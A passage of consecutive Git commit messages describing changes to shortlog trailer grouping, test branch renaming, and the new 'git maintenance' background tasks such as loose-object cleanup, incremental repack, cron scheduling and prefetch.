fully prepared to handle non-SHA1 object ids. Rename it to
`abbrev_oid_in_line()`.
A few comments in `wt_status_get_detached_from()` mention "sha1". The
variable they refer to was renamed in e86ab2c1cd ("wt-status: convert to
struct object_id", 2017-02-21). Update the comments to reference "oid"
instead.
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that shortlog supports reading from trailers, it can be useful to
combine counts from multiple trailers, or between trailers and authors.
This can be done manually by post-processing the output from multiple
runs, but it's non-trivial to make sure that each name/commit pair is
counted only once.
This patch teaches shortlog to accept multiple --group options on the
command line, and pull data from all of them. That makes it possible to
run:
git shortlog -ns --group=author --group=trailer:co-authored-by
to get a shortlog that counts authors and co-authors equally.
The implementation is mostly straightforward. The "group" enum becomes a
bitfield, and the trailer key becomes a list. I didn't bother
implementing the multi-group semantics for reading from stdin. It would
be possible to do, but the existing matching code makes it awkward, and
I doubt anybody cares.
The duplicate suppression we used for trailers now covers authors and
committers as well (though in non-trailer single-group mode we can skip
the hash insertion and lookup, since we only see one value per commit).
There is one subtlety: we now care about the case when no group bit is
set (in which case we default to showing the author). The caller in
builtin/log.c needs to be adapted to ask explicitly for authors, rather
than relying on shortlog_init(). It would be possible with some
gymnastics to make this keep working as-is, but it's not worth it for a
single caller.
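The bitfield and the per-commit duplicate suppression can be modelled roughly as below. This is a Python sketch under assumptions, not the shortlog code: the `Group` flag names, the commit dicts and `count_commits()` are all hypothetical.

```python
from collections import Counter
from enum import Flag, auto


class Group(Flag):
    AUTHOR = auto()
    COMMITTER = auto()
    TRAILER = auto()


def count_commits(commits, groups, trailer_keys=()):
    """Count commits per identity, crediting each name once per commit."""
    if not groups:
        # No group bit set: default to showing the author.
        groups = Group.AUTHOR
    counts = Counter()
    for commit in commits:
        seen = set()  # suppresses duplicates within one commit
        if Group.AUTHOR in groups:
            seen.add(commit["author"])
        if Group.COMMITTER in groups:
            seen.add(commit["committer"])
        if Group.TRAILER in groups:
            for key, value in commit.get("trailers", []):
                if key.lower() in trailer_keys:
                    seen.add(value)
        counts.update(seen)
    return counts
```

Passing `Group.AUTHOR | Group.TRAILER` with `{"co-authored-by"}` corresponds to the command line shown above: somebody who is both author and co-author of a commit is still counted once for it.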
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Trailers don't necessarily contain name/email identity values, so
shortlog has so far treated them as opaque strings. However, since many
trailers do contain identities, it's useful to treat them as such when
they can be parsed. That lets "-e" work as usual, as well as mailmap.
When they can't be parsed, we'll continue with the old behavior of
treating them as a single string (there's no new test for that here,
since the existing tests cover a trailer like this).
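A simplified model of the two cases, in Python. The regular expression and the name `parse_trailer_value` are assumptions for illustration; Git's own ident parsing has different and stricter rules.

```python
import re

# "Name <email>" with nothing after the closing bracket (simplified).
_IDENT = re.compile(r"^\s*(?P<name>[^<>]*?)\s*<(?P<email>[^<>]*)>\s*$")


def parse_trailer_value(value):
    """Return (name, email), or (value, None) when it is not an identity."""
    m = _IDENT.match(value)
    if m is None:
        # Not parseable as an identity: keep it as one opaque string.
        return (value.strip(), None)
    return (m.group("name"), m.group("email"))
```

Only values that yield an email can be shown with "-e" or looked up in a mailmap; the rest are grouped by their literal text, as before.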
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This function is actually useful for parsing any identity, whether from
stdin or not. We'll need it for handling trailers.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The current documentation is vague about what happens with
--group=trailer:signed-off-by when we see a commit with:
Signed-off-by: One
Signed-off-by: Two
Signed-off-by: One
We clearly should credit both "One" and "Two", but should "One" get
credited twice? The current code does so, but mostly because that was
the easiest thing to do. It's probably more useful to count each commit
at most once. This will become especially important when we allow
values from multiple sources in a future patch.
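In other words, the example commit above should add one to the count of "One" and one to the count of "Two". A minimal Python model of that rule (the function name and the list-of-lists input are assumptions for this sketch):

```python
from collections import Counter


def credit_trailers(trailer_values_per_commit):
    """Credit each distinct trailer value at most once per commit."""
    counts = Counter()
    for values in trailer_values_per_commit:
        # A set drops the repeated "One" within a single commit.
        counts.update(set(values))
    return counts
```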
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If a project uses commit trailers, this patch lets you use
shortlog to see who is performing each action. For example,
running:
git shortlog -ns --group=trailer:reviewed-by
in git.git shows who has reviewed. You can even use a custom
format to see things like who has helped whom:
git shortlog --format="...helped %an (%ad)" \
--group=trailer:helped-by
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The trailer code knows how to parse out the trailers and re-format them,
but there's no easy way to iterate over the trailers (you can use
trailer_info, but you have to then do a bunch of extra parsing).
Let's add an iteration interface that makes this easy to do.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for adding more grouping types, let's refactor the
committer/author grouping code and add a user-facing option that binds
them together. In particular:
- the main option is now "--group", to make it clear
that the various group types are mutually exclusive. The
"--committer" option is an alias for "--group=committer".
- we keep an enum rather than a binary flag, to prepare
for more values
- we prefer switch statements to ternary assignment, since
other group types will need more custom code
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The completion tests used that name unnecessarily, and it is a
non-inclusive term, so let's avoid using it here.
Since three of the touched test cases make use of the fact that two of
the branch names (`master` and `maint`) start with the same letter (or
even with the same two letters), we choose to replace the use of
`master` by a name that also has that property: `main`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The term `master` has a loaded history that serves as a constant
reminder of racial injustice. The Git project has no desire to
perpetuate this and already started avoiding it.
The test suite uses variations of this name for branches other than the
default one. Apart from t3200, where we just addressed this in the
previous commit, those instances can be renamed in an automated manner
because they do not require any changes outside of the test script, so
let's do that.
Seeing as the touched branches have very little (if anything) to do with
the default branch, we choose to use a completely separate naming
scheme: `topic_<number>` (it cannot be `topic-<number>` because t5515
uses the `test_oid` machinery with the term, and that machinery uses
shell variables internally, whose names cannot contain dashes).
This trick was performed by this (GNU) sed invocation:
$ sed -i 's/master\([a-z0-9]\)/topic_\1/g' t/t*.sh
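To see what the pattern does and does not touch, here is an equivalent substitution in Python. The function name is made up for this sketch; the sed basic-regex group `\(...\)` becomes a plain `(...)` in Python.

```python
import re


def rename_branches(text):
    """Apply the same substitution as the sed invocation above."""
    # Only "master" followed by a lowercase letter or digit is rewritten,
    # and that following character is kept via the backreference.
    return re.sub(r"master([a-z0-9])", r"topic_\1", text)
```

A bare `master` (followed by a space, a quote or end of line) is left alone, which is why the default branch name itself is not affected by this change.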
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
21bf933928 (ref-filter: allow merged and no-merged filters, 2020-09-15)
added an early return to reach_filter(). Avoid leaking the memory of a
then unused array by postponing its allocation until we know we need it.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently only the long version (--source=) supports completion.
Add completion support to the short (-s) option too.
Signed-off-by: Ákos Uzonyi <uzonyi.akos@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In both _git_checkout and _git_switch a new "prevword" variable was
introduced, however the "prev" variable already contains the last word.
The "prevword" variable is replaced with "prev", and the case is moved
to the beginning of the function, like it's done in many other places
(e.g. _git_commit). Also the indentation of the case is fixed.
Signed-off-by: Ákos Uzonyi <uzonyi.akos@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"diff-highlight" (in contrib/) had a logic to flush its output upon
seeing a blank line but the way it detected a blank line was broken.
* jk/diff-highlight-blank-match-fix:
diff-highlight: correctly match blank lines for flush
"git push" that wants to be atomic and wants to send push
certificate learned not to prepare and sign the push certificate
when it fails the local check (hence due to atomicity it is known
that no certificate is needed).
* hx/push-atomic-with-cert:
send-pack: run GPG after atomic push checking
The "unshelve" subcommand of "git p4" incorrectly used
commit^N where it meant to say commit~N to name the Nth generation
ancestor, which has been corrected.
* ld/p4-unshelve-fix:
git-p4: use HEAD~$n to find parent commit for unshelve
git-p4 unshelve: adding a commit breaks git-p4 unshelve
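The difference between the two notations can be shown with a small Python model of a commit graph. The `parents` mapping and both function names are assumptions for illustration; this is not git-p4 code.

```python
def nth_parent(parents, commit, n):
    """Model of commit^n: the n-th parent of commit (1-based)."""
    return parents[commit][n - 1]


def nth_generation(parents, commit, n):
    """Model of commit~n: follow the first parent n times."""
    for _ in range(n):
        commit = parents[commit][0]
    return commit
```

On a linear history D -> C -> B -> A, the model gives B for D~2, whereas D^2 asks for a second parent that a non-merge commit does not have.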
"git receive-pack" that accepts requests by "git push" learned to
outsource most of the ref updates to the new "proc-receive" hook.
* jx/proc-receive-hook:
doc: add documentation for the proc-receive hook
transport: parse report options for tracking refs
t5411: test updates of remote-tracking branches
receive-pack: new config receive.procReceiveRefs
doc: add document for capability report-status-v2
New capability "report-status-v2" for git-push
receive-pack: feed report options to post-receive
receive-pack: add new proc-receive hook
t5411: add basic test cases for proc-receive hook
transport: not report a non-head push as a branch
A "git gc"'s big brother has been introduced to take care of more
repository maintenance tasks, not limited to the object database
cleaning.
* ds/maintenance-part-1:
maintenance: add trace2 regions for task execution
maintenance: add auto condition for commit-graph task
maintenance: use pointers to check --auto
maintenance: create maintenance.<task>.enabled config
maintenance: take a lock on the objects directory
maintenance: add --task option
maintenance: add commit-graph task
maintenance: initialize task array
maintenance: replace run_auto_gc()
maintenance: add --quiet option
maintenance: create basic maintenance runner
The object name written to this file is not exposed to end-users and
the only reader of this file immediately expands it back to a full
object name. Stop abbreviating while writing, and expect a full
object name while reading, which simplifies the code a bit.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Because these constructs can be used to parse user input to be
passed to rev-list --objects, e.g.
range=$(git rev-parse v1.0..v2.0) &&
git rev-list --objects $range | git pack-objects --stdin
the endpoints (v1.0 and v2.0 in the example) are shown without
peeling them to underlying commits, even when they are annotated
tags. Make sure it stays that way.
While at it, ensure "rev-parse A...B" also keeps the endpoints A and
B unpeeled, even though the negative side (i.e. the merge-base
between A and B) has to become a commit.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Protocol v2 became the default in v2.26.0 via 684ceae32d (fetch: default
to protocol version 2, 2019-12-23). More widespread use turned up a
regression in negotiation. That was fixed in v2.27.0 via 4fa3f00abb
(fetch-pack: in protocol v2, in_vain only after ACK, 2020-04-27), but we
also reverted the default to v0 as a precaution in 11c7f2a30b (Revert
"fetch: default to protocol version 2", 2020-04-22).
In v2.28.0, we re-enabled it for experimental users with 3697caf4b9
(config: let feature.experimental imply protocol.version=2, 2020-05-20)
and haven't heard any complaints. v2.28 has only been out for 2 months,
but I'd generally expect people turning on feature.experimental to also
stay pretty up-to-date. So we're not likely to collect much more data by
waiting. In addition, we have no further reports from people running
v2.26.0, and of course some people have been setting protocol.version
manually for ages.
Let's move forward with v2 as the default again. It's possible there are
still lurking bugs, but we won't know until it gets more widespread use.
And we can find and squash them just like any other bug at this point.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add new subcommands to 'git maintenance' that start or stop background
maintenance using 'cron', when available. This integration is as simple
as I could make it, barring some implementation complications.
The schedule is laid out as follows:
0 1-23 * * * $cmd maintenance run --schedule=hourly
0 0 * * 1-6 $cmd maintenance run --schedule=daily
0 0 * * 0 $cmd maintenance run --schedule=weekly
where $cmd is a properly-qualified 'git for-each-repo' execution:
$cmd=$path/git --exec-path=$path for-each-repo --config=maintenance.repo
where $path points to the location of the Git executable running 'git
maintenance start'. This is critical for systems with multiple versions
of Git. Specifically, macOS has a system version at '/usr/bin/git' while
the version that users can install resides at '/usr/local/bin/git'
(symlinked to '/usr/local/libexec/git-core/git'). This will also use
your locally-built version if you build and run this in your development
environment without installing first.
This conditional schedule avoids having cron launch multiple 'git
for-each-repo' commands in parallel. Such parallel commands would likely
lead to the 'hourly' and 'daily' tasks competing over the object
database lock. This could lead to some tasks never being run! Since
the --schedule=<frequency> argument will run all tasks with _at least_
the given frequency, the daily runs will also run the hourly tasks.
Similarly, the weekly runs will also run the daily and hourly tasks.
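That the three cron lines never overlap can be checked with a small Python model. The table below restates only the hour and day-of-week fields of the schedule above (0 is Sunday in cron); the names `CRON_TABLE` and `schedules_firing` are made up for this sketch.

```python
# (hours, weekdays, schedule) for the three crontab lines.
CRON_TABLE = [
    (range(1, 24), range(0, 7), "hourly"),  # 0 1-23 * * *
    (range(0, 1), range(1, 7), "daily"),    # 0 0 * * 1-6
    (range(0, 1), range(0, 1), "weekly"),   # 0 0 * * 0
]


def schedules_firing(hour, weekday):
    """Return the schedules whose cron line matches this hour and weekday."""
    return [name for hours, days, name in CRON_TABLE
            if hour in hours and weekday in days]
```

For every hour of every weekday the list has exactly one element, so cron starts one 'git for-each-repo' at a time.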
The GIT_TEST_CRONTAB environment variable is not intended for users to
edit, but instead as a way to mock the 'crontab [-l]' command. This
variable is set in test-lib.sh so that a future test that accidentally
runs anything with the cron integration cannot modify the user's
schedule. We use GIT_TEST_CRONTAB='test-tool crontab <file>' in our
tests to check how the schedule is modified in 'git maintenance
(start|stop)' commands.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for launching background maintenance from the 'git
maintenance' builtin, create register/unregister subcommands. These
commands update the new 'maintenance.repos' config option in the global
config so the background maintenance job knows which repositories to
maintain.
These commands allow users to add a repository to the background
maintenance list without disrupting the actual maintenance mechanism.
For example, a user can run 'git maintenance register' when no
background maintenance is running and it will not start the background
maintenance. A later update to start running background maintenance will
then pick up this repository automatically.
The opposite example is that a user can run 'git maintenance unregister'
to remove the current repository from background maintenance without
halting maintenance for other repositories.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It can be helpful to store a list of repositories in global or system
config and then iterate Git commands on that list. Create a new builtin
that makes this process simple for experts. We will use this builtin to
run scheduled maintenance on all configured repositories in a future
change.
The test is very simple, but does highlight that the "--" argument is
optional.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Maintenance currently triggers when certain data-size thresholds are
met, such as number of pack-files or loose objects. Users may want to
run certain maintenance tasks based on frequency instead. For example,
a user may want to perform a 'prefetch' task every hour, or 'gc' task
every day. To help these users, update the 'git maintenance run' command
to include a '--schedule=<frequency>' option. The allowed frequencies
are 'hourly', 'daily', and 'weekly'. These values are also allowed in a
new config value 'maintenance.<task>.schedule'.
The 'git maintenance run --schedule=<frequency>' checks the '*.schedule'
config value for each enabled task to see if the configured frequency is
at least as frequent as the frequency from the '--schedule' argument. We
use the following order, for full clarity:
'hourly' > 'daily' > 'weekly'
Use new 'enum schedule_priority' to track these values numerically.
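The comparison can be modelled in Python as below. The numeric values, the member names and `tasks_to_run()` are assumptions for this sketch; only the ordering 'hourly' > 'daily' > 'weekly' comes from the description above.

```python
from enum import IntEnum


class SchedulePriority(IntEnum):
    NONE = 0    # task has no schedule configured
    WEEKLY = 1
    DAILY = 2
    HOURLY = 3


def tasks_to_run(task_schedules, requested):
    """Select tasks configured at least as frequently as `requested`."""
    return [task for task, schedule in task_schedules.items()
            if schedule >= requested]
```

A --schedule=daily run therefore picks up the 'hourly' tasks as well, and a task without a schedule is never selected.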
The following cron table would run the scheduled tasks with the correct
frequencies:
0 1-23 * * * git -C <repo> maintenance run --schedule=hourly
0 0 * * 1-6 git -C <repo> maintenance run --schedule=daily
0 0 * * 0 git -C <repo> maintenance run --schedule=weekly
This cron schedule will run --schedule=hourly every hour except at
midnight. This avoids a concurrent run with the --schedule=daily that
runs at midnight every day except the first day of the week. This avoids
a concurrent run with the --schedule=weekly that runs at midnight on
the first day of the week. Since --schedule=daily also runs the
'hourly' tasks and --schedule=weekly runs the 'hourly' and 'daily'
tasks, we will still see all tasks run with the proper frequencies.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Some commands run 'git maintenance run --auto --[no-]quiet' after doing
their normal work, as a way to keep repositories clean as they are used.
Currently, users who do not want this maintenance to occur would set the
'gc.auto' config option to 0 to prevent the 'gc' task from running.
However, this does not stop the extra process invocation. On Windows,
this extra process invocation can be more expensive than necessary.
Allow users to drop this extra process by setting 'maintenance.auto' to
'false'.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The incremental-repack task updates the multi-pack-index by deleting pack-
files that have been replaced with new packs, then repacking a batch of
small pack-files into a larger pack-file. This incremental repack is faster
than rewriting all object data, but is slower than some other
maintenance activities.
The 'maintenance.incremental-repack.auto' config option specifies how many
pack-files should exist outside of the multi-pack-index before running
the step. These pack-files could be created by 'git fetch' commands or
by the loose-objects task. The default value is 10.
Setting the option to zero disables the task with the '--auto' option,
and a negative value makes the task run every time.
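The three cases can be summarized by a small Python model. The function name is hypothetical, and treating the limit as "at least this many pack-files" is an assumption about the exact comparison.

```python
def incremental_repack_auto(packs_outside_midx, limit=10):
    """Decide whether the task should run under '--auto'."""
    if limit == 0:
        return False  # zero disables the task with --auto
    if limit < 0:
        return True   # negative: run every time
    # Assumed comparison: run once the count reaches the limit.
    return packs_outside_midx >= limit
```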
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When repacking during the 'incremental-repack' task, we use the
--batch-size option in 'git multi-pack-index repack'. The initial setting
used --batch-size=0 to repack everything into a single pack-file. This is
not sustainable for a large repository. The amount of work required is
also likely to use too many system resources for a background job.
Update the 'incremental-repack' task by dynamically computing a
--batch-size option based on the current pack-file structure.
The dynamic default size is computed with this idea in mind for a client
repository that was cloned from a very large remote: there is likely one
"big" pack-file that was created at clone time. Thus, do not try
repacking it as it is likely packed efficiently by the server.
Instead, we select the second-largest pack-file, and create a batch size
that is one larger than that pack-file. If there are three or more
pack-files, then this guarantees that at least two will be combined into
a new pack-file.
Of course, this means that the second-largest pack-file size is likely
to grow over time and may eventually surpass the initially-cloned
pack-file. Recall that the pack-file batch is selected in a greedy
manner: the packs are considered from oldest to newest and are selected
if they have size smaller than the batch size until the total selected
size is larger than the batch size. Thus, that oldest "clone" pack will
be first to repack after the new data creates a pack larger than that.
We also want to place some limits on how large these pack-files become,
in order to bound the amount of time spent repacking. A maximum
batch-size of two gigabytes means that large repositories will never be
packed into a single pack-file using this job, but also that repack is
rather expensive. This is a trade-off that is valuable to have if the
maintenance is being run automatically or in the background. Users who
truly want to optimize for space and performance (and are willing to pay
the upfront cost of a full repack) can use the 'gc' task to do so.
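The computation described above can be sketched in Python. The exact value of the two gigabyte constant and the handling of repositories with fewer than two pack-files are assumptions of this sketch, as is the function name.

```python
TWO_GIGABYTES = 2 * 1024 ** 3  # assumed value of the hard-coded maximum


def auto_batch_size(pack_sizes):
    """Return one more than the second-largest pack size, capped at 2 GB."""
    sizes = sorted(pack_sizes, reverse=True)
    # Assumption: with fewer than two packs, treat the second-largest as 0.
    second_largest = sizes[1] if len(sizes) > 1 else 0
    return min(second_largest + 1, TWO_GIGABYTES)
```

With pack sizes 5000, 300 and 100, the batch size is 301: the big "clone" pack is skipped and the two smaller packs both fit under the limit.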
Create a test for this two gigabyte limit by creating an EXPENSIVE test
that generates two pack-files of roughly 2.5 gigabytes in size, then
performs an incremental repack. Check that the --batch-size argument in
the subcommand uses the hard-coded maximum.
Helped-by: Chris Torek <chris.torek@gmail.com>
Reported-by: Son Luong Ngoc <sluongng@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous change cleaned up loose objects using the
'loose-objects' task that can be run safely in the background. Add a
similar job that performs similar cleanups for pack-files.
One issue with running 'git repack' is that it is designed to
repack all pack-files into a single pack-file. While this is the
most space-efficient way to store object data, it is not time or
memory efficient. This becomes extremely important if the repo is
so large that a user struggles to store two copies of the pack on
their disk.
Instead, perform an "incremental" repack by collecting a few small
pack-files into a new pack-file. The multi-pack-index facilitates
this process ever since 'git multi-pack-index expire' was added in
19575c7 (multi-pack-index: implement 'expire' subcommand,
2019-06-10) and 'git multi-pack-index repack' was added in ce1e4a1
(midx: implement midx_repack(), 2019-06-10).
The 'incremental-repack' task runs the following steps:
1. 'git multi-pack-index write' creates a multi-pack-index file if
one did not exist, and otherwise will update the multi-pack-index
with any new pack-files that appeared since the last write. This
is particularly relevant with the background fetch job.
When the multi-pack-index sees two copies of the same object, it
stores the offset data into the newer pack-file. This means that
some old pack-files could become "unreferenced" which I will use
to mean "a pack-file that is in the pack-file list of the
multi-pack-index but none of the objects in the multi-pack-index
reference a location inside that pack-file."
2. 'git multi-pack-index expire' deletes any unreferenced pack-files
and updates the multi-pack-index to drop those pack-files from the
list. This is safe to do as concurrent Git processes will see the
multi-pack-index and not open those packs when looking for object
contents. (Similar to the 'loose-objects' job, there are some Git
commands that open pack-files regardless of the multi-pack-index,
but they are rarely used. Further, a user that self-selects to
use background operations would likely refrain from using those
commands.)
3. 'git multi-pack-index repack --batch-size=<size>' collects a set
of pack-files that are listed in the multi-pack-index and creates
a new pack-file containing the objects whose offsets are listed
by the multi-pack-index to be in those pack-files. The set of
pack-files is selected greedily by sorting the pack-files by modified
time and adding a pack-file to the set if its "expected size" is
smaller than the batch size until the total expected size of the
selected pack-files is at least the batch size. The "expected
size" is calculated by taking the size of the pack-file divided
by the number of objects in the pack-file and multiplied by the
number of objects from the multi-pack-index with offset in that
pack-file. The expected size approximates how much data from that
pack-file will contribute to the resulting pack-file size. The
intention is that the resulting pack-file will be close in size
to the provided batch size.
The next run of the incremental-repack task will delete these
repacked pack-files during the 'expire' step.
In this version, the batch size is set to "0" which ignores the
size restrictions when selecting the pack-files. It instead
selects all pack-files and repacks all packed objects into a
single pack-file. This will be updated in the next change, but
it requires doing some calculations that are better isolated to
a separate change.
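The greedy selection in step 3 can be sketched in Python as follows. This models the description above rather than the midx code: the dict keys, both function names and the use of integer division are assumptions.

```python
def expected_size(pack_size, objects_in_pack, objects_referenced):
    """Estimate how much of a pack ends up in the new pack-file."""
    # Multiply first so integer division does not round small packs to 0.
    return pack_size * objects_referenced // objects_in_pack


def select_batch(packs, batch_size):
    """Pick pack names oldest-first until the batch size is reached.

    Each pack is a dict with keys name, mtime, size, num_objects and
    referenced (objects the multi-pack-index locates in that pack).
    """
    by_age = sorted(packs, key=lambda p: p["mtime"])
    if batch_size == 0:
        # Zero ignores the size restrictions: select every pack-file.
        return [p["name"] for p in by_age]
    selected, total = [], 0
    for pack in by_age:
        if total >= batch_size:
            break
        estimate = expected_size(pack["size"], pack["num_objects"],
                                 pack["referenced"])
        if estimate >= batch_size:
            continue  # too big for this batch; leave it alone
        selected.append(pack["name"])
        total += estimate
    return selected
```

A large, old pack whose expected size exceeds the batch size is skipped, while the small packs after it are collected until their total reaches the batch size.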
These steps are based on a similar background maintenance step in
Scalar (and VFS for Git) [1]. This was incredibly effective for
users of the Windows OS repository. After using the same VFS for Git
repository for over a year, some users had _thousands_ of pack-files
that combined to up to 250 GB of data. We noticed a few users were
running into the open file descriptor limits (due in part to a bug
in the multi-pack-index fixed by af96fe3 (midx: add packs to
packed_git linked list, 2019-04-29)).
These pack-files were mostly small since they contained the commits
and trees that were pushed to the origin in a given hour. The GVFS
protocol includes a "prefetch" step that asks for pre-computed pack-
files containing commits and trees by timestamp. These pack-files
were grouped into "daily" pack-files once a day for up to 30 days.
If a user did not request prefetch packs for over 30 days, then they
would get the entire history of commits and trees in a new, large
pack-file. This led to a large number of pack-files that had poor
delta compression.
By running this pack-file maintenance step once per day, these repos
with thousands of packs spanning 200+ GB dropped to dozens of pack-
files spanning 30-50 GB. This was done all without removing objects
from the system and using a constant batch size of two gigabytes.
Once the work was done to reduce the pack-files to small sizes, the
batch size of two gigabytes means that not every run triggers a
repack operation, so the following run will not expire a pack-file.
This has kept these repos in a "clean" state.
[1] https://github.com/microsoft/scalar/blob/master/Scalar.Common/Maintenance/PackfileMaintenanceStep.cs
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Now that the multi-pack-index may be written as part of auto maintenance
at the end of a command, reduce the progress output when the operations
are quick. Use start_delayed_progress() instead of start_progress().
Update t5319-multi-pack-index.sh to use GIT_PROGRESS_DELAY=0 now that
the progress indicators are conditional.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The core.multiPackIndex setting has been around since c4d25228eb
(config: create core.multiPackIndex setting, 2018-07-12), but has been
disabled by default. If a user wishes to use the multi-pack-index
feature, then they must enable this config and run 'git multi-pack-index
write'.
The multi-pack-index feature is relatively stable now, so make the
config option true by default. For users that do not use a
multi-pack-index, the only extra cost will be a file lookup to see if a
multi-pack-index file exists (once per process, per object directory).
Also, this config option will be referenced by an upcoming
"incremental-repack" task in the maintenance builtin, so move the config
option into the repository settings struct. Note that if
GIT_TEST_MULTI_PACK_INDEX=1, then we want to ignore the config option
and treat core.multiPackIndex as enabled.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The loose-objects task deletes loose objects that already exist in a
pack-file, then places the remaining loose objects into a new pack-file.
If this step runs all the time, then we risk creating pack-files with
very few objects with every 'git commit' process. To prevent
overwhelming the packs directory with small pack-files, place a minimum
number of objects to justify the task.
The 'maintenance.loose-objects.auto' config option specifies a minimum
number of loose objects to justify the task to run under the '--auto'
option. This defaults to 100 loose objects. Setting the value to zero
will prevent the step from running under '--auto' while a negative value
will force it to run every time.
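The threshold rule can be written down as a small predicate. This is only a sketch in Python under stated assumptions: the function name is hypothetical, and treating "a minimum number" as an inclusive comparison (`>=`) is a guess rather than something the message specifies.

```python
def should_run_loose_objects(loose_count, auto_threshold=100):
    # Zero disables the task under --auto.
    if auto_threshold == 0:
        return False
    # A negative value forces the task to run every time.
    if auto_threshold < 0:
        return True
    # Assumption: the minimum is inclusive.
    return loose_count >= auto_threshold
```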
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
One goal of background maintenance jobs is to allow a user to
disable auto-gc (gc.auto=0) but keep their repository in a clean
state. Without any cleanup, loose objects will clutter the object
database and slow operations. In addition, the loose objects will
take up extra space because they are not stored with deltas against
similar objects.
Create a 'loose-objects' task for the 'git maintenance run' command.
This helps clean up loose objects without disrupting concurrent Git
commands using the following sequence of events:
1. Run 'git prune-packed' to delete any loose objects that exist
in a pack-file. Concurrent commands will prefer the packed
version of the object to the loose version. (Of course, there
are exceptions for commands that specifically care about the
location of an object. These are rare for a user to run on
purpose, and we hope a user that has selected background
maintenance will not be trying to do foreground maintenance.)
2. Run 'git pack-objects' on a batch of loose objects. These
objects are grouped by scanning the loose object directories in
lexicographic order until listing all loose objects -or-
reaching 50,000 objects. This is more than enough if the loose
objects are created only by a user doing normal development.
We noticed users with _millions_ of loose objects because VFS
for Git downloads blobs on-demand when a file read operation
requires populating a virtual file.
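The batching in step 2 amounts to a bounded, ordered directory scan. The following Python sketch illustrates the idea only; the function name and the way object names are reassembled from the two-character fan-out directories are assumptions for the example, and the real task feeds the names to 'git pack-objects' rather than returning a list.

```python
import os

HEX_DIGITS = "0123456789abcdef"


def collect_loose_batch(objects_dir, limit=50000):
    # Scan the fan-out directories ("00" through "ff") in lexicographic
    # order and stop once `limit` object names have been collected.
    batch = []
    for fanout in sorted(os.listdir(objects_dir)):
        if len(fanout) != 2 or any(c not in HEX_DIGITS for c in fanout):
            continue  # skips entries such as "pack" and "info"
        subdir = os.path.join(objects_dir, fanout)
        if not os.path.isdir(subdir):
            continue
        for name in sorted(os.listdir(subdir)):
            if len(batch) >= limit:
                return batch
            batch.append(fanout + name)
    return batch
```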
This step is based on a similar step in Scalar [1] and VFS for Git.
[1] https://github.com/microsoft/scalar/blob/master/Scalar.Common/Maintenance/LooseObjectsStep.cs
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When working with very large repositories, an incremental 'git fetch'
command can download a large amount of data. If there are many other
users pushing to a common repo, then this data can rival the initial
pack-file size of a 'git clone' of a medium-size repo.
Users may want to keep the data on their local repos as close as
possible to the data on the remote repos by fetching periodically in
the background. This can break up a large daily fetch into several
smaller hourly fetches.
The task is called "prefetch" because it is work done in advance
of a foreground fetch to make that 'git fetch' command much faster.
However, if we simply ran 'git fetch <remote>' in the background,
then the user running a foreground 'git fetch <remote>' would lose
some important feedback when a new branch appears or an existing
branch updates. This is especially true if a remote branch is
force-updated and this isn't noticed by the user because it occurred
in the background. Further, the functionality of 'git push
--force-with-lease' becomes suspect.
When running 'git fetch <remote> <options>' in the background, use
the following options for careful updating:
1. --no-tags prevents getting a new tag when a user wants to see
the new tags appear in their foreground fetches.
2. --refmap= removes the configured refspec which usually updates
refs/remotes/<remote>/* with the refs advertised by the remote.
While this looks confusing, this was documented and tested by
b40a50264a (fetch: document and test --refmap="", 2020-01-21),
including this sentence in the documentation:
Providing an empty `<refspec>` to the `--refmap` option
causes Git to ignore the configured refspecs and rely
entirely on the refspecs supplied as command-line arguments.
3. By adding a new refspec "+refs/heads/*:refs/prefetch/<remote>/*"
we can ensure that we actually load the new values somewhere in
our refspace while not updating refs/heads or refs/remotes. By
storing these refs here, the commit-graph job will update the
commit-graph with the commits from these hidden refs.
4. --prune will delete the refs/prefetch/<remote> refs that no
